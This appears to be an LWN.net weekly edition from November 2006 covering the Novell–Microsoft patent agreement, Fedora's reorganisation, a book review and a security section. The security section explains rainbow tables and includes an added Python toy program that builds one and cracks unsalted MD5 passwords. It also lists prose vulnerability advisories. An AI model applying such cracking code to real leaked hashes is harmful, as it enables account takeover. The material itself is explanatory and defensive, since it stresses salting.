
LWN.net Weekly Edition for November 9, 2006

On Novell and Microsoft

Depending on who is commenting, the recently announced agreement between Microsoft and Novell is either the ultimate victory or the beginning of the end for Linux. If there is anything that is clear about this new arrangement, it's that nobody really understands what it means yet. Perhaps, in the end, it means less than most people hope or fear.

Parts of the agreement are reasonably easy to understand. Microsoft will now officially recommend SUSE Linux to its customers who are determined to run something other than Windows on some of their machines. Microsoft will also hand out "coupons" for Novell support. A joint "research center" will be set up to work on projects of interest to both companies; virtualization, network management, and document formats are on the list of topics to be addressed. Among other things, this work could result in better support for documents in Microsoft formats, an area of active interest for many years.

The part of the agreement which has attracted the most attention, however, is the patent deal. This is also the hardest part to understand, and its real implications may take years to become clear. These seem to be the relevant points:

  • The two companies have entered into a "covenant not to sue" each other's paying customers for patent violations. So SUSE (but not OpenSUSE) users should be free of the fear of being hauled into court by Microsoft's lawyers, and Windows users need no longer stay awake at nights worrying about a legal attack from Novell.

  • The companies are making patent royalty payments to each other. It appears that the net cash flow is in Novell's direction, because there are more Windows products shipped than SUSE products. But the fact remains: Microsoft has succeeded in collecting a tax on every SUSE Linux distribution supported by Novell.

  • Microsoft has made a promise not to sue individual developers for patent violations - sort of.

The text of the covenant not to sue has been posted. It would appear to cover Novell's paid customers for their particular use of SUSE Linux. It's not clear that the term "use" extends to the ways some of us "use" Linux - distributing it to others, for example. Microsoft can tweak or terminate the agreement at any time "pursuant to the terms of the Patent Cooperation Agreement between Novell and Microsoft that was publicly announced on November 2, 2006"; of course, the terms of that agreement are not publicly available. The agreement is currently slated to end in 2012, however.

To some, this agreement represents a total sell-out of Linux users by Novell. To others, it is simply Novell trying to eliminate a specific source of FUD against its customers. How it will really play out remains to be seen.

Novell insists that it has not licensed any patents from Microsoft - that the "covenant not to sue" is an entirely different thing. It is somewhat hard to believe that a courtroom would come to the same conclusion, especially given the fact that royalty payments are being made. The distinction may become very important to Novell. Many observers have pointed out section 7 of the GNU General Public License:

If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program.

What this text means is that, if Microsoft is asserting patents against GPL-licensed code, Novell cannot distribute that code to its customers just because it has a "license" from Microsoft. There is some suspicion that Novell is trying to use the "covenant not to sue" as a way of weaseling out of this restriction, but it is difficult to imagine such a strategy succeeding. If Novell's customers cannot redistribute Linux, then Novell cannot distribute it to them.

So, should Microsoft ever go after a user of GPL-licensed code, Novell will find itself in a difficult position. Either distribution of the code in question in the lawsuit must be stopped, creating potential problems for Novell's customers, or Novell can continue distribution under its non-license with Microsoft, inviting suits from copyright holders. Either way, a Microsoft patent suit against Linux would not be a comfortable experience for Novell, even with this agreement in place.

Adding to the non-license claim, Novell's Kurt Garloff told LWN:

Like before, Novell does not acknowledge that any software it ships actually does infringe on a patent. As soon as Novell would determine that GPL software is affected by a MS patent, Novell would change the software to avoid/work around being affected by the patent.

This is a clear position which contains all the right words. It is still hard to square the claim that no patents have been acknowledged with the royalty payments, however. If Novell acknowledges no patent infringements, what, exactly, is it paying royalties on? Perhaps it is just naked protection money for its customers. Or, perhaps, this is a concession Novell had to make to obtain the royalty stream from Microsoft.

One of the criticisms of this deal centers on the implicit acknowledgment of patent problems in Linux. Companies pursuing patent shakedowns often use the existence of paying licensees as evidence in their favor. If, however, Novell has in truth not licensed (or obtained "covenants not to sue") on any specific patents, then the value of Novell as evidence, especially in court, will be small.

A separate - and very interesting - question remains: how, exactly, does Novell's "covenant not to sue" affect the patents which Novell donated to the Open Invention Network (OIN)? Those patents are at the core of OIN's deterrent power, and it is the promise of protection from OIN which enabled the inclusion of Mono-based software into the Fedora Core distribution. If Novell's non-license covers those patents, then OIN's credibility as a deterrent to lawsuits by Microsoft will take a large hit. Your editor was unable to get an answer from Novell on this question in this article's time frame (getting answers from lawyers takes time). It would seem, however, from an inexpert reading, that the relevant patents have been truly assigned to OIN, and are no longer Novell's to non-license to anybody. If that reading is correct, then OIN's position is just as strong as it was before.

That question has not been settled, however, and there is a lot of concern in the community. The Fedora Project is actively considering the future of Mono in its distribution - one of many interesting decisions that project will be making in the near future.

Finally, there is the matter of Microsoft's promise not to sue individual developers. Anybody who is interested should just go read the text of the promise. As long as individual developers stay in their own basements and don't try to do anything rash - like distribute their code - they will be safe. For anybody who is trying to actually be a part of the free software development community, however, Microsoft's promise has no value at all. There is no point, even, in getting worked up about the fact that Microsoft reserves the right to change its promise at any time. For individual developers, nothing has changed at all.

In fact, for most of us, nothing has really changed. Software patent suits were a serious threat before, and they are still a serious threat. Some argue that Novell's agreement has made a patent attack from Microsoft more likely (Steve Ballmer's latest FUD is often quoted), but that is not at all clear. It is hard to see Microsoft suing Linux users; those whose pockets are deep enough to make them worth suing are certainly Microsoft customers too. A patent suit against another Linux distributor would leave Novell in a seriously uncomfortable position, and likely shatter this new partnership. The threat is there, certainly, just like it was before.

To your editor's eye, the deal looks like the following. Novell, despite trying to do a lot of the right things, finds itself a distant second in the corporate Linux market. Red Hat has proved hard to beat, and the entry of Oracle into this market - supporting Red Hat's distribution - seems unlikely to help. In this context, the deal with Microsoft must look like it has some real advantages: it might help SUSE Linux to achieve the best interoperability with Microsoft products, bring in a few more sales, provide a new royalty revenue stream, and eliminate a source of FUD which might just, still, be bothering a few potential customers. All of these could help to solidify Novell's position in the market, for a while at least.

So, the claims that Novell has sold out Linux for its own advancement are probably overblown - assuming that OIN retains its power. Most of the community will probably be unaffected, and, if we're really lucky, we might get a bit of code out of the deal. What Novell has done to itself will take longer to work out. Walking into Microsoft's embrace has not always led to long-term joy for the companies involved. On the other hand, some sort of engagement between Microsoft and Linux must happen at some point; it is not as if Microsoft will simply vanish. Novell has taken that step; whether it turns out to be a good thing (for Novell, and for the community) is something we will have to see over time.


Big decisions loom for Fedora

The Fedora Project is in one of those relatively rare periods where the deadlines have passed, the distribution has been shipped, and no new deadlines have yet been set. Now is the time when participants in the project can engage in a bit of introspection, and that's exactly what is going on. Over the next week or so, decisions will be made which could significantly change the way this project works.

For some background, readers may want to look at this posting from Thorsten Leemhuis and Max Spevack's state of Fedora note. The developers involved with Fedora seem to think that the Fedora Core 6 process went well, and that, as a result, FC6 is a solid distribution. They are justifiably proud of their work. That said, there are a number of issues on the Fedora developers' minds, and a number of changes which, seemingly, need to be made.

To that end, the Fedora Project Board will be meeting on November 7. The real discussion, however, will happen at a special "Fedora Summit" happening from November 11 through the 15th. It is a closed affair, featuring Max Spevack, Greg DeKoenigsberg, Bill Nottingham, Chris Blizzard, Warren Togami, Dave Jones, Jeremy Katz, Jesse Keating, and perhaps various others at times. This group of people will try to make a plan for the development of Fedora Core 7 and the future organization of the project.

Since its inception, Fedora has been criticized for not being as open to the community as its early PR had led people to hope. Much progress has been made in that direction over the last year or so, but much remains to be done. Greg DeKoenigsberg is quite clear that making the project more open is a priority, and that the time has come:

We've got a lot of work to do inside the fenceline, though. Honestly, a lot of that work requires the disentanglement of Fedora and RHEL -- we need the ability to innovate freely in Fedora without adversely impacting RHEL. We didn't really have that opportunity in the FC6 timeframe.

But now we do.

From the resulting discussion, it would appear that one significant decision has already been made, at least in principle: the Fedora Core distribution, as such, will be abolished. Fedora Extras has been sufficiently successful that it increasingly looks like the model for Fedora as a whole in the future. There does not appear to be any dissent to this idea; the hot topic, instead, seems to be how the new distribution will be named. "Fedora Linux" appears to be the leading choice at the moment.

But, then, nobody has really gotten down to discussing - in public, at least - how the new, more open Fedora will work. There will still have to be a decision-making mechanism, a way for setting the goals and priorities for the project. Red Hat is still picking up most of the tab for work on Fedora, so there are still likely to be limits to how much latitude the company is willing to give the project to set its own priorities. A good place to start might be to establish the Fedora Steering Committee - first promised in 2003 - with a significant number of outside contributors and let it provide some direction (in the open) for the project as a whole.

Another topic for the discussion is the future of the Fedora Legacy project, which was discussed here last month. It appears that the project has finally come to see Fedora Legacy - or its absence - as a problem. How that problem will be solved is far from clear at this point, however. Another nagging problem is the ongoing maintenance of rpm; that, too, looks like it may be addressed by the board meeting and the summit.

Then there are issues like the ongoing lack of a Fedora live CD. Desktop support is getting more attention, though it is hard to see how Fedora can address many of the complaints in this area (lack of official Java, flash support, etc.) while remaining true to its "free software only" rules. Making a source code management system available to the wider community remains on the "to do" list. And so on.

In other words, Fedora has a lot of work to do, still, before it becomes a truly open, community project. Nothing illustrates that better than the fact that the directions and priorities for the next Fedora release will be set in closed board and summit meetings. What seems different now is that the project insiders appear more determined than ever to get this work done. For all that Fedora is a great distribution, it needs its community to continue to grow and reach its potential. Given all that needs to be done to become more open to its community, Fedora is likely to still be very much a work in progress by the time the Fedora Linux 7 (or whatever it is called) is released. But, then, that is true of a great many free software projects.


Review: Linux Administration Handbook, Second Edition

Your editor is often asked if he would be willing to be a technical reviewer for an upcoming Linux-oriented book. Such requests are almost always turned down. Technical review is an important task, but it takes vast amounts of time and the compensation is mostly measured in karma points. It is a hard task to squeeze in. Evi Nemeth, however, earned special consideration many years ago when she allowed LWN's co-founders to do their Data Structures homework on the University of Colorado's lone VAX 11/780 - on the condition that they learn C. She also let your editor make some "fixes" (long since lost, mercifully) to the memory management system on the early BSD release running on that VAX. So, when Evi and company asked for help reviewing the second edition of the Linux Administration Handbook, your editor agreed to do it.

This was not a trivial task; the Handbook now weighs in at a full 1000 pages. It is derived from the classic Unix Administration Handbook, which was the definitive administration manual for its times. The second iteration is an attempt to bring the book up to date with the current Linux state of the art, an attempt which is not 100% successful. The fact remains, however, that the Linux Administration Handbook remains unmatched for its combination of clear writing, technical depth, and extensive experience in all aspects of system and network management.

A glance through the table of contents shows that some audiences will get more out of the Handbook than others. The chapters on DNS and electronic mail administration are over 100 pages - each. Networking is covered in detail, from how to wire up an RJ-45 connector through Samba administration. Backups, printing, process management, the bootstrap process, and so on are all addressed. There is also a lot of accumulated wisdom on dealing with users, working with vendors, managing system administration groups, tracking problems, etc. If you are charged with managing mostly server-oriented systems, this book has almost everything you need.

The second edition updates the Handbook in a number of ways. Ubuntu "Dapper" and Fedora Core 5 have been added to the list of covered distributions; they join RHEL 4.3, SUSE Linux Enterprise 10.2, and Debian Testing (to be Etch) as of last September. Bacula is now covered in detail (and much of the Amanda discussion has been taken out). The electronic mail chapter - while still centered mostly on sendmail - now has a reasonable section on postfix. The security chapter has been filled out with the latest tools. And so on.

As your editor can well attest, however, bringing a book up to the current state of Linux is a hard task - and it never stays current for long. Still, at times, the Linux Administration Handbook shows its age a little too much. Back in the days of VAXen and early Unix workstations, we all got very good at dealing with serial ports and making terminals talk. But how many of us need a chapter on that subject now? The security chapter passes over SELinux entirely - a major shortcoming. As far as the authors are concerned, udev seems not to exist - it is only mentioned in passing. But how does one manage a contemporary system without an understanding of udev? There's plenty of information on how deeply Ethernet hubs can be cascaded, but wireless networking is passed over almost entirely.

There is also almost no discussion of contemporary desktops. The Handbook authors avoid graphical administration tools in favor of really understanding (and being able to script) the system at a lower level, and this is good. But an administrator in this century should have a sense for how the desktop goes together and how to configure things to give users the experience and capabilities they need. The second edition does add a badly-needed chapter on the X Window System, but it leaves the upper parts of the desktop untouched.

So the second edition of the Linux Administration Handbook is not perfect. But, for a large part of the system administration space, this book has the best combination of "how to do it" (technical details) and "how you should do it" (what works well in the real world). It is still the first place your editor looks when the man page falls short. If your job requires keeping Linux systems running, especially if it's in a larger environment, you probably need this book on your shelf.


Page editor: Jonathan Corbet

Security

Rainbow tables for password cracking

November 8, 2006

This article was contributed by Jake Edge.

An announcement about a new site offering free 'rainbow tables' on the bugtraq mailing list sparked our interest; what are these tables and what can they be used for? It turns out that rainbow tables are the result of pre-computing the outputs of one-way hash functions so that those outputs can be reversed. In effect, the right set of tables makes a one-way hash function reversible for certain inputs, and the inputs of interest are passwords.

Many applications use one-way hash functions (such as MD5 or SHA1) to store passwords because they hide the password value from prying eyes, but it is easy to compare hashed passwords when a user logs in. This relies on the fact that it is difficult to reverse the hash function and produce the original password, but the application can just apply the hash function to the password presented and compare the output to the stored hash. Operating systems, database management systems, web and other applications often use this method to store their users' passwords.

For those that might want to crack a password, a straightforward, but very time consuming method would be to brute force it. Generate the hashed values for each string in the password search space and compare it to the hashed value of interest; when they match, the password is cracked. If one needed to crack passwords regularly, it might make sense to store the password to hash mappings so that it would just take a lookup to find any previously cracked password. The storage requirements of that kind of table, for any plausible set of potential passwords (say 1-8 alphanumeric characters) are huge. Rainbow tables are a way to reduce the storage requirements substantially while still preserving much of the speed benefits of using a lookup table.

To create a rainbow table, you must first come up with a reduction function that takes a hash as input and maps it to a password in the search space. You then start with a password and repeatedly hash and reduce it several thousand times, creating a chain of passwords. You discard all but the first and last password and store that pair. To reverse a particular hash value, you reduce it and look for the resulting password as the end of one of the stored chains. If you do not find it, you hash and reduce again and look once more. Once you find a matching chain end, you use the stored first password to recreate the chain; the cracked password is the one that immediately precedes the target hash in that chain (it is the second to last password only when the very first reduction produced the chain end).

This ingenious scheme comes from a paper presented at the CRYPTO 2003 conference. The paper is a bit dense if you are unfamiliar with the references cited, so the author has a simplified explanation as well.

Rainbow tables are specific to a particular hash algorithm and password search space and that is where the free rainbow tables site comes in handy. There are currently two tables available there, one for MD5 and one for the older Windows DES-based password algorithm. The MD5 version is 36Gb in size and will crack 99.9% of lowercase alphanumeric passwords that are eight characters or less in length. The site also has links to other sites with tables as well as to the Project RainbowCrack site which has source for various programs to generate and use the tables.

The best defense against rainbow tables is 'salt', which has been a part of UNIX passwords since near the beginning of time (UNIX epoch time anyway). Salt is a random string that is added to the password before hashing it and then stored with the password. Linux MD5 passwords store the salt between two dollar signs in the password field in /etc/shadow. This random string effectively multiplies the number of tables required to do a dictionary lookup by the number of individual salt values available. Even just eight bits of salt (and Linux uses much more than that) would require nine terabytes of rainbow table.

While this technique is not particularly effective at recovering OS passwords (at least on Linux), there are quite a number of web applications that store straight MD5 passwords without any salt (and some, sadly, store plaintext passwords). Other applications may do that as well. If the password hashes become exposed via a SQL injection or other flaw, rainbow tables could be just the ticket to breaking into those systems.
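As an added example (not code from the article, the free rainbow tables site, or Project RainbowCrack), here is a toy Python rainbow table for unsalted MD5 over a deliberately tiny search space: it builds chains with a different reduction function per column, handles the false alarms that chain merges cause during lookup, and shows that a salted hash falls outside the table. The four-character lowercase search space, the chain length, and the plain salt+password concatenation are simplifying assumptions made here, not the article's or Linux's actual parameters.

```python
"""Toy rainbow table for unsalted MD5 password hashes (added illustration).

The search space is tiny (lowercase passwords of exactly PW_LEN characters)
so the table builds in seconds. A rainbow table uses a *different*
reduction function at each column of the chain, which is what limits chain
merges compared with using a single reduction function throughout.
"""
import hashlib
import string
from typing import Dict, Optional

CHARSET = string.ascii_lowercase
PW_LEN = 4                          # 26**4 = 456,976 candidate passwords
SPACE = len(CHARSET) ** PW_LEN
CHAIN_LEN = 200                     # hash/reduce steps per chain (toy value)


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def reduce_hash(digest_hex: str, column: int) -> str:
    """Map a hash back into the password space.

    Mixing `column` into the index gives a distinct reduction function for
    every column, so two chains merge only if they produce the same
    password in the same column.
    """
    n = (int(digest_hex[:16], 16) + column) % SPACE
    out = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(CHARSET))
        out.append(CHARSET[r])
    return "".join(out)


def build_table(n_chains: int) -> Dict[str, str]:
    """Return {chain_end: chain_start}; only the endpoints are stored.

    Start points are derived deterministically so runs are reproducible.
    Two chains that end in the same password have merged; the later one
    overwrites the earlier, which is the coverage cost of a merge.
    """
    table: Dict[str, str] = {}
    for i in range(n_chains):
        start = reduce_hash(md5_hex(f"start-{i}"), 0)   # constructed start point
        pw = start
        for col in range(CHAIN_LEN):
            pw = reduce_hash(md5_hex(pw), col)
        table[pw] = start
    return table


def crack(table: Dict[str, str], target_hex: str) -> Optional[str]:
    """Recover the password behind an unsalted MD5 digest, if the table covers it."""
    # The target could sit at any column; try each one, starting from the
    # last column because it needs the fewest steps to reach a chain end.
    for col in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_hash(target_hex, col)
        for later in range(col + 1, CHAIN_LEN):
            pw = reduce_hash(md5_hex(pw), later)
        start = table.get(pw)
        if start is None:
            continue
        # A chain end matched: regenerate that chain from its stored start
        # and return the password immediately preceding the target hash.
        pw = start
        for c in range(CHAIN_LEN):
            if md5_hex(pw) == target_hex:
                return pw
            pw = reduce_hash(md5_hex(pw), c)
        # The end matched but the chain never produced the target: a false
        # alarm caused by a chain merge. Keep trying other columns.
    return None


def known_password(table: Dict[str, str], column: int) -> str:
    """Return the password at `column` of one stored chain (for demos/checks)."""
    pw = next(iter(table.values()))
    for c in range(column):
        pw = reduce_hash(md5_hex(pw), c)
    return pw


def salted_md5_hex(salt: str, password: str) -> str:
    """Simplified salted hash (plain concatenation, an assumption here).

    Linux's $1$ md5crypt is more involved, but the defensive effect is the
    same: the table was built for md5(password), so md5(salt + password)
    is simply not in it, and every salt value would need its own table.
    """
    return md5_hex(salt + password)


if __name__ == "__main__":
    table = build_table(2000)
    print(f"{len(table)} distinct chain ends from 2000 chains (merges lost)")
    pw = known_password(table, 5)
    print("unsalted:", pw, "->", crack(table, md5_hex(pw)))
    print("salted:  ", pw, "->", crack(table, salted_md5_hex("Qx", pw)))
```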


New vulnerabilities

imlib2: arbitrary code execution

Package(s):imlib2 CVE #(s):CVE-2006-4806 CVE-2006-4807 CVE-2006-4808 CVE-2006-4809
Created:November 6, 2006 Updated:August 13, 2007
Description: M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges.
Alerts:
Mandriva MDKSA-2007:156 2007-08-10
Gentoo 200612-20 2006-12-20
Fedora FEDORA-EXTRAS-2006-004 2006-11-09
Mandriva MDKSA-2006:198-1 2006-11-06
Mandriva MDKSA-2006:198 2006-11-06
Ubuntu USN-376-2 2006-11-06
Ubuntu USN-376-1 2006-11-03


ingo1: missing input sanitizing

Package(s):ingo1 CVE #(s):CVE-2006-5449
Created:November 3, 2006 Updated:November 27, 2006
Description: It was discovered that the Ingo email filter rules manager performs insufficient escaping of user-provided data in created procmail rules files, which allows the execution of arbitrary shell commands.
Alerts:
Gentoo 200611-22 2006-11-27
Debian DSA-1204-1 2006-11-02


kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-4572 CVE-2006-4997
Created:November 6, 2006 Updated:January 17, 2007
Description: Some vulnerabilities were discovered in the Linux 2.6 kernel:

There are possibly exploitable bugs in the IPv6 netfilter code. (CVE-2006-4572)

The ATM subsystem of the Linux kernel could allow a remote attacker to cause a Denial of Service (panic) via unknown vectors that cause the ATM subsystem to access the memory of socket buffers after they are freed. (CVE-2006-4997)

Alerts:
Red Hat RHSA-2007:0013-01 2007-01-17
Red Hat RHSA-2007:0012-01 2007-01-17
Debian DSA-1237-1 2006-12-17
rPath rPSA-2006-0204-1 2006-11-09
Mandriva MDKSA-2006:197 2006-11-03


libpam-ldap: insecure password control

Package(s):libpam-ldap CVE #(s):CVE-2006-5170
Created:November 3, 2006 Updated:December 21, 2006
Description: Steve Rigler discovered that the PAM module for authentication against LDAP servers processes PasswordPolicyResponse control messages incorrectly, which might allow an attacker to log into a suspended system account.
Alerts:
Gentoo 200612-19 2006-12-20
SuSE SUSE-SR:2006:027 2006-11-24
Red Hat RHSA-2006:0719-01 2006-11-15
Mandriva MDKSA-2006:201 2006-11-07
Trustix TSLSA-2006-0061 2006-11-03
Debian DSA-1203-1 2006-11-02


libX11: file descriptor leak

Package(s):libX11 CVE #(s):CVE-2006-5397
Created:November 7, 2006 Updated:November 8, 2006
Description: The Xinput module (modules/im/ximcp/imLcIm.c) in X.Org libX11 1.0.2 and 1.0.3 opens a file for reading twice using the same file descriptor, which causes a file descriptor leak that allows local users to read files specified by the XCOMPOSEFILE environment variable via the duplicate file descriptor.
Alerts:
Mandriva MDKSA-2006:199 2006-11-06


Mozilla products: multiple vulnerabilities

Package(s):thunderbird firefox seamonkey CVE #(s):CVE-2006-5463 CVE-2006-5747 CVE-2006-5748 CVE-2006-5464
Created:November 8, 2006 Updated:December 11, 2006
Description: Numerous vulnerabilities have been found in the Mozilla JavaScript and HTML rendering code, leading to possible remote code execution attacks. This CERT advisory contains details.
Alerts:
Gentoo 200612-08 2006-12-10
Gentoo 200612-07 2006-12-10
Gentoo 200612-06 2006-12-10
Debian DSA-1227-1 2006-12-04
Debian DSA-1225-2 2006-12-03
Debian DSA-1225-1 2006-12-03
Debian DSA-1224-1 2006-12-03
Ubuntu USN-381-1 2006-11-16
Ubuntu USN-382-1 2006-11-16
SuSE SUSE-SA:2006:068 2006-11-16
Slackware SSA:2006-313-01 2006-11-10
rPath rPSA-2006-0206-1 2006-11-09
Mandriva MDKSA-2006:206 2006-11-09
Mandriva MDKSA-2006:205 2006-11-09
Fedora FEDORA-2006-1199 2006-11-08
Red Hat RHSA-2006:0735-01 2006-11-08
Red Hat RHSA-2006:0734-01 2006-11-08
Red Hat RHSA-2006:0733-02 2006-11-08
Fedora FEDORA-2006-1194 2006-11-08
Fedora FEDORA-2006-1192 2006-11-08
Fedora FEDORA-2006-1191 2006-11-08


openssh: privilege separation issue

Package(s):openssh CVE #(s):CVE-2006-5794
Created:November 8, 2006 Updated:April 5, 2007
Description: From the OpenSSH 4.5 announcement: "Fix a bug in the sshd privilege separation monitor that weakened its verification of successful authentication. This bug is not known to be exploitable in the absence of additional vulnerabilities."
Alerts:
Fedora FEDORA-2007-395 2007-04-03
Fedora FEDORA-2006-1215 2006-11-20
Fedora FEDORA-2006-1214 2006-11-20
SuSE SUSE-SR:2006:026 2006-11-17
Trustix TSLSA-2006-0063 2006-11-15
Red Hat RHSA-2006:0738-01 2006-11-15
rPath rPSA-2006-0207-1 2006-11-09
Mandriva MDKSA-2006:204 2006-11-08
OpenPKG OpenPKG-SA-2006.032 2006-11-08


php: buffer overflows

Package(s):php CVE #(s):CVE-2006-5465
Created:November 3, 2006 Updated:January 18, 2010
Description: The Hardened-PHP Project discovered buffer overflows in the internal routines behind PHP's htmlentities() and htmlspecialchars() functions. Of course, the whole purpose of these functions is to be fed user input. (The overflow can only occur when UTF-8 is used.)
Alerts:
Mandriva MDVSA-2010:007 2010-01-15
SuSE SUSE-SA:2006:067 2006-11-15
rPath rPSA-2006-0205-1 2006-11-09
Red Hat RHSA-2006:0731-01 2006-11-10
Red Hat RHSA-2006:0730-01 2006-11-06
Debian DSA-1206-1 2006-11-06
Fedora FEDORA-2006-1169 2006-11-06
Fedora FEDORA-2006-1168 2006-11-06
Slackware SSA:2006-307-01 2006-11-06
OpenPKG OpenPKG-SA-2006.028 2006-11-06
Ubuntu USN-375-1 2006-11-02
Mandriva MDKSA-2006:196 2006-11-02


postgresql: several vulnerabilities

Package(s):postgresql-8.1 CVE #(s):CVE-2006-5540 CVE-2006-5541 CVE-2006-5542
Created:November 3, 2006 Updated:November 8, 2006
Description: Michael Fuhr discovered an incorrect type check when handling unknown literals. By attempting to coerce such a literal to the ANYARRAY type, a local authenticated attacker could cause a server crash. (CVE-2006-5541)

Josh Drake and Alvaro Herrera reported a crash when using aggregate functions in UPDATE statements. A local authenticated attacker could exploit this to crash the server backend. This update disables this construct, since it is not very well defined and forbidden by the SQL standard. (CVE-2006-5540)

Sergey Koposov discovered a flaw in the duration logging. This could cause a server crash under certain circumstances. (CVE-2006-5542)

Alerts:
Ubuntu USN-369-2 2006-11-01


rpm: arbitrary code execution

Package(s):rpm CVE #(s):CVE-2006-5466
Created:November 6, 2006 Updated:August 28, 2007
Description: An error was found in the RPM library's handling of query reports. In some locales, certain RPM packages would cause the library to crash. If a user was tricked into querying a specially crafted RPM package, the flaw could be exploited to execute arbitrary code with the user's privileges.
Alerts:
Fedora FEDORA-2007-668 2007-08-27
Gentoo 200611-08 2006-11-13
Mandriva MDKSA-2006:200 2006-11-07
Ubuntu USN-378-1 2006-11-04


texinfo: buffer overflow

Package(s):texinfo CVE #(s):CVE-2006-4810
Created:November 8, 2006 Updated:November 27, 2006
Description: Texinfo contains a buffer overflow which could be exploited (via a specially-crafted info file) to run arbitrary code.
Alerts:
rPath rPSA-2006-0219-1 2006-11-27
Debian DSA-1219-1 2006-11-27
Gentoo 200611-16 2006-11-21
OpenPKG OpenPKG-SA-2006.034 2006-11-15
Ubuntu USN-379-1 2006-11-09
Fedora FEDORA-2006-1203 2006-11-09
Fedora FEDORA-2006-1202 2006-11-09
Red Hat RHSA-2006:0727-01 2006-11-08
Mandriva MDKSA-2006:203 2006-11-08


thttpd: insecure temporary files

Package(s):thttpd CVE #(s):CVE-2006-4248
Created:November 3, 2006 Updated:December 1, 2006
Description: Marco d'Itri discovered that thttpd, a small, fast and secure webserver, makes use of insecure temporary files when its logfiles are rotated, which might lead to a denial of service through a symlink attack.
Alerts:
Debian DSA-1205-2 2006-12-01
Debian DSA-1205-1 2006-11-02


wireshark: multiple vulnerabilities

Package(s):wireshark ethereal CVE #(s):CVE-2006-4574 CVE-2006-4805 CVE-2006-5468 CVE-2006-5469 CVE-2006-5740
Created:November 3, 2006 Updated:November 14, 2006
Description: There are multiple vulnerabilities in Wireshark (formerly Ethereal):
  • Off-by-one error in the MIME Multipart dissector in Wireshark 0.10.1 through 0.99.3 allows remote attackers to cause a denial of service (crash) via certain vectors that trigger an assertion error related to unexpected length values. CVE-2006-4574
  • epan/dissectors/packet-xot.c in the XOT dissector (dissect_xot_pdu) in Wireshark 0.9.8 through 0.99.3 allows remote attackers to cause a denial of service (memory consumption and crash) via an encoded XOT packet that produces a zero length value when it is decoded. CVE-2006-4805
  • Unspecified vulnerability in the HTTP dissector in Wireshark 0.99.3 allows remote attackers to cause a denial of service (crash) via unspecified vectors. CVE-2006-5468
  • Unspecified vulnerability in the WBXML dissector in Wireshark 0.10.11 through 0.99.3 allows remote attackers to cause a denial of service (crash) via certain vectors that trigger a null dereference. CVE-2006-5469
  • Unspecified vulnerability in the LDAP dissector in Wireshark 0.99.3 allows remote attackers to cause a denial of service (crash) via a crafted LDAP packet. CVE-2006-5740
Alerts:
SuSE SUSE-SA:2006:065 2006-11-14
Red Hat RHSA-2006:0726-01 2006-11-09
Mandriva MDKSA-2006:195 2006-11-02
Debian DSA-1201-1 2006-10-31
rPath rPSA-2006-0202-1 2006-11-01
Fedora FEDORA-2006-1140 2006-11-01
Fedora FEDORA-2006-1141 2006-11-01

Comments (none posted)

wv: integer overflow

Package(s):wv CVE #(s):CVE-2006-4513
Created:November 2, 2006 Updated:December 7, 2006
Description: The wv library has an integer overflow vulnerability in the DOC file parser. If a user can be tricked into opening a maliciously crafted MSWord file, a remote attacker can execute arbitrary code with the privileges of the user.
Alerts:
Gentoo 200612-01 2006-12-07
Mandriva MDKSA-2006:202 2006-11-07
Ubuntu USN-374-1 2006-11-01

Comments (none posted)

Updated vulnerabilities

apache: cross-site scripting

Package(s):apache CVE #(s):CVE-2006-3918
Created:August 9, 2006 Updated:April 4, 2008
Description: From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header."
Alerts:
SuSE SUSE-SA:2008:021 2008-04-04
Ubuntu USN-575-1 2008-02-04
SuSE SUSE-SA:2006:051 2006-09-08
Debian DSA-1167-1 2005-09-04
Red Hat RHSA-2006:0619-01 2006-08-10
Red Hat RHSA-2006:0618-01 2006-08-08

Comments (none posted)

asterisk: arbitrary code execution

Package(s):asterisk CVE #(s):CVE-2006-5444
Created:October 19, 2006 Updated:December 6, 2006
Description: The Asterisk telephony PBX application has a heap overflow vulnerability in the skinny channel driver. A remote attacker can use this to arbitrarily execute code with the privileges of the Asterisk user. See this vulnerability report for more information.
Alerts:
Debian DSA-1229-1 2006-12-06
SuSE SUSE-SA:2006:069 2006-11-16
Gentoo 200610-15 2006-10-30
OpenPKG OpenPKG-SA-2006.024 2006-10-19

Comments (none posted)

bind: denial of service

Package(s):bind CVE #(s):CVE-2006-4095 CVE-2006-4096
Created:September 7, 2006 Updated:February 1, 2007
Description: Bind has two denial of service vulnerabilities.

On recursive servers, queries for SIG records will trigger an assertion failure if more than one RRset is returned.

An INSIST failure can be triggered by sending a large number of recursive queries.

Alerts:
Fedora FEDORA-2007-164 2007-01-31
Gentoo 200609-11 2006-09-15
Slackware SSA:2006-257-01 2006-09-15
Fedora FEDORA-2006-966 2006-09-11
Debian DSA-1172-1 2006-09-09
Mandriva MDKSA-2006:163 2006-09-08
rPath rPSA-2006-0166-1 2006-09-08
Ubuntu USN-343-1 2006-09-07
OpenPKG OpenPKG-SA-2006.019 2006-09-07

Comments (none posted)

busybox: insecure password generation

Package(s):busybox CVE #(s):CVE-2006-1058
Created:May 5, 2006 Updated:May 2, 2007
Description: The BusyBox 1.1.1 passwd command does not use a proper salt when generating password hashes, so a brute-force attack against them could take very little time.
Alerts:
Red Hat RHSA-2007:0244-02 2007-05-01
Fedora FEDORA-2006-511 2006-05-04
Fedora FEDORA-2006-510 2006-05-04

Comments (2 posted)

bzip2: race condition and infinite loop

Package(s):bzip2 CVE #(s):CAN-2005-0953 CAN-2005-1260
Created:May 17, 2005 Updated:January 10, 2007
Description: A race condition in bzip2 1.0.2 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by bzip2 after the decompression is complete. Also specially crafted bzip2 archives may cause an infinite loop in the decompressor.
Alerts:
rPath rPSA-2007-0004-1 2007-01-09
Debian DSA-741-1 2005-07-07
Red Hat RHSA-2005:474-01 2005-06-16
